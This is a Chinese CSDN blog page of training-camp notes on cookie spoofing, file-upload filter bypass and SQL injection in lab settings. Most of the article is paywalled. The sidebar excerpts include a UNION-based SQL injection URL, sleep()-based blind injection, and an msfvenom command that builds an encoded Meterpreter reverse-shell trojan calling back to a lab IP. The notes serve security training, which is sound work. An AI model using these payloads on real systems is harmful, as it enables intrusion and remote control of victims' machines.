蓝盾实训营day3——文件上传、SQL注入进阶

最新推荐文章于 2024-08-05 22:16:17 发布
最新推荐文章于 2024-08-05 22:16:17 发布
阅读量1k 收藏 5
点赞数 2
分类专栏: 网络安全 蓝盾十天网络攻防实训营记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mingC0758/article/details/80997078
版权
本文介绍了在蓝盾实训营中的文件上传和SQL注入的进阶技巧。在文件上传部分,讲解了如何通过Burp Suite修改文件类型以绕过过滤,00截断方法以及文件格式伪装。而在SQL注入方面,重点讨论了POST型SQL注入,通过1 or 1=1测试验证了数字型注入,并提到了特殊字符过滤问题。
摘要由CSDN通过智能技术生成

cookie欺骗

原理:把登陆后的cookie保存下来,在其他地方访问页面时携带这个cookie..

用桂林老兵可以方便地查看当前网页保存的cookie:
这里写图片描述

https可能做不了这个实验

  • HTTP Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。
  • HTTPS Cookie 设置了secure , 该cookie只能在HTTPS通道下被写入浏览器。
  • HTTP Cookie 未设置了secure ,该cookie既可以在HTTPS也可以在HTTP通道下被写入浏览器。
  • HTTPS Cookie 未设置了secure ,该cookie既可以在HTTPS也可以在HTTP通道下被写入浏览器(可能会泄露信息安全)。

文件上传进阶

4
网站对上传的php文件进行过滤了,如果改后缀为.jpg,文件是可以上传成功,但是不被解析成asp的话,菜刀就连接不了。

通过burp suit 修改文件类型

(DVWA的文件上传渗透测试-中等难度)

最低0.47元/天 解锁文章
mingC0758
关注
专栏目录
蓝盾实训营day1——配置渗透环境和SQL注入
mingC0758的博客
07-09 821
蓝盾实训营day1——配置渗透环境和SQL注入 有幸参加了蓝盾在学校办的10天的实训营,把过程笔记发到这里,希望可以分享给更多的人。 黑客是如何入侵的 踩点 whois 扫描 nmap 提权 破坏 后门 搜索网络设备 shodan.io 远程摄像头…… 搜索jaws/1.0 country:”CN” windows服务器 不开源 收费 nma...
原创:APT之网站SQL注入导致的文件任意上传
08-24
原创:APT之网站SQL注入导致的文件任意上传
[转贴]ASP漏洞全接触-进阶
longge165的专栏
09-28 941
文章来源:军团论坛     发布时间:2005-05-15 08:29:27         在入门篇,我们学会了SQL注入的判断方法,但真正要拿到网站的保密内容,是远远不够的。接下来,我们就继续学习如何从数据库中获取想要获得的内容,首先,我们先看看SQL注入的一般步骤:  第一节、SQL注入的一般步骤   首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。   其次,根据注入参数
SQL注入之webshell上传
最新发布
aihua002的博客
08-05 349
1.高版本的MYSQL添加了一个新的特性secure_file_priv,该选项限制了mysql导出文件的权限,所以该选项为可以=‘“”/=一个路径,不能为NULL,secure_file_priv=“” 代表文件读写没有限制,secure_file_priv=一个路径,代表只能对该路径下文件进行读写,而secure_file_priv=NULL 代表不能对文件进行读写。首先webshell上传就是利用MySQL的文件读写注入而实现,要想上传webshell就得了解文件读写注入的原理。
sql注入进阶
qq_37051023的博客
08-28 423
1、order by ---获取字段数原理 order by--在数据库中是排序的意思 例如:在数据中正常执行select * from app,则得到如下信息 执行排序,则得到如下信息: 对比上述信息,得知对第一列字段进行了排序,那么如果执行order by 5,则会产生错误,因为当前数据库app,不存在第五列数据,则无法进行排序。 那么当进行sql注入时,通过http://x.x.x.x/1.jsp?id=1 order by x的方式可以推测出当前数据库存在几列。 2、u...
SQL注入进阶
m0_49420271的博客
06-11 224
SQL注入进阶篇内容,7种注入方式。
SQL注入进阶
菜鸟的学习笔记
02-02 304
4.2 SQL注入进阶 4.2.1时间注入 与布尔盲注不同的是,时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间边长。时间盲注多与IF(expr1,expr2,expr3)结合使用,这条IF语句的含义是:“如果expr1是TRUE,那么IF()的返回值为expr2;否则返回值为expr3.” 所以判断数据库库名长度的语句为: if(length(database())>1,sleep(10),1) /*含义是:如果数据库库名长度大于1执行sleep(10)睡眠10秒,否
蓝盾实训营day10——Web渗透实战
mingC0758的博客
07-20 903
扫描 SQL注入 开放了80端口,直接用浏览器访问靶机的网站,发现有SQL注入点: payload http://192.168.188.150/index.php?s=/news/6) and 1=2 union select 1,database(),3,4,5,6,version()-- 最终得到数据库账号密码: 这里用的是base64加密,可以直接解密成明...
蓝盾实训营day7——meterpreter木马生成和利用
mingC0758的博客
07-17 1136
meterpreter木马生成和利用 木马生成 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe > shell.exe lhost 本地ip lport 本地端口 命令完成后,会在当前目录下生成一个...
蓝盾实训营day6——日志查看和木马清除
mingC0758的博客
07-16 981
开启服务器日志和木马清除 开启服务器日志和木马清除 根据应用服务器的不同,有不同的日志开启方法,具体方法直接百度就行,比较简单。开启日志之后,用web扫描工具对网站进行扫描,利用文件上传漏洞进行挂马,然后我们可以查看日志,如果发现有未知页面被客户端访问,则可能发生了挂马行为,查找服务器有没有该木马文件,有就删掉。 apache-php开启日志方法 打开文件: Apa...
SQL注入高级进阶
06-04
SQL注入高级进阶
sql注入进阶
qq_40909772的博客
07-17 431
一、时间注入。 1.测试过程。 测试地址:http://192.168.57.128:1237/time/time.php?id=1   当访问该地址时,页面返回yes,在网址的后面加上单引号,再次访问,页面返回no。这与Boolean注入非常相似,但是我们将采用另外一种注入方法解决——时间盲注。 时间盲注是利用sleep()或benchmark()等函数让Mysql的执行时间边长,它多与IF(expr1,expr2,expr3)结合使用,此if语句含义是:如果expr1是TRUE,则if()的返回值为ex
SQl注入-进阶
BoomJane的专栏
08-23 1371
【一、SQL注入的基本步骤】 首先,判断环境,寻找注入点,判断数据库类型。 其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种: (1)数字型 比如,ID=49 这类注入的参数,SQL语句原貌大致如下: Select * from 表名 where 字段=49 注入的参数为ID=49 And [查询条件],即是生成语句: Select *
SQL注入进阶
JBlock的博客
10-07 506
5.1、大小写变种 这种技巧适用于关键字阻塞过滤器不聪明的时候,我们可以变换关键字字符串中字符的大小写来避开过滤,因为使用不区分大小写的方式处理SQL关键字。 例如:(下面的代码就是一个简单的关键字阻塞过滤器)     function waf($id1){     if(strstr($id1,'union')){         echo 'error:lllegal inp
SQL注入——文件上传
heyingcheng的博客
03-11 2459
3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径。2,数据库的file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限。在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限。其实我们最终的目的是往目标靶场上上传一句话木马,或者是自己想上传的php文件。当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。
SQL注入进阶篇(一)
qq_46217803的博客
08-04 1558
信息搜集阶段:利用内置函数搜集信息数据获取阶段:通过语句查询找到关键的内容,或通过暴力破解(比如遍历ASCII码来猜测)提权阶段:利用本身数据库的权限,或读写文件提权在我们不知道任何信息的前提下,可以整理以下思路步骤,通过information_schema中内置的函数来引出有用的信息SELECT schema_name from information_schema.SCHEMATA #查库。...
web渗透笔记之sql注入进阶篇)
yida223的博客
04-03 1369
sql注入笔记
渗透之路进阶 -- SQL注入进阶(盲注和报错注入)
r0cky的博客
09-18 593
SQL注入之盲注 实战过程中,大多情况下很少会有回显,这个时候就要去使用盲注技术 盲注,Blind SQL Injection,听这名字就感觉整个过程就是一个盲目的过程 当注入时,没有任何提示的时候,就改用上盲注 常见函数 ascii(str) str是一个字符串参数,返回值为其最左侧字符的ascii码。通过它,我们才能确定特定的字符。 substr(str,start,len) 这个函数是...
广州白工商高级技校与蓝盾公司校企合作案例
首先,校企双方共同建设了“蓝盾信息安全教育示范性实训基地”,这是一个广州市公共实训基地项目,拥有130平方米的场地和48个机位,能够满足网络安全专业全部实训项目的需求。这个实训室的建设和调试,为学生提供了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值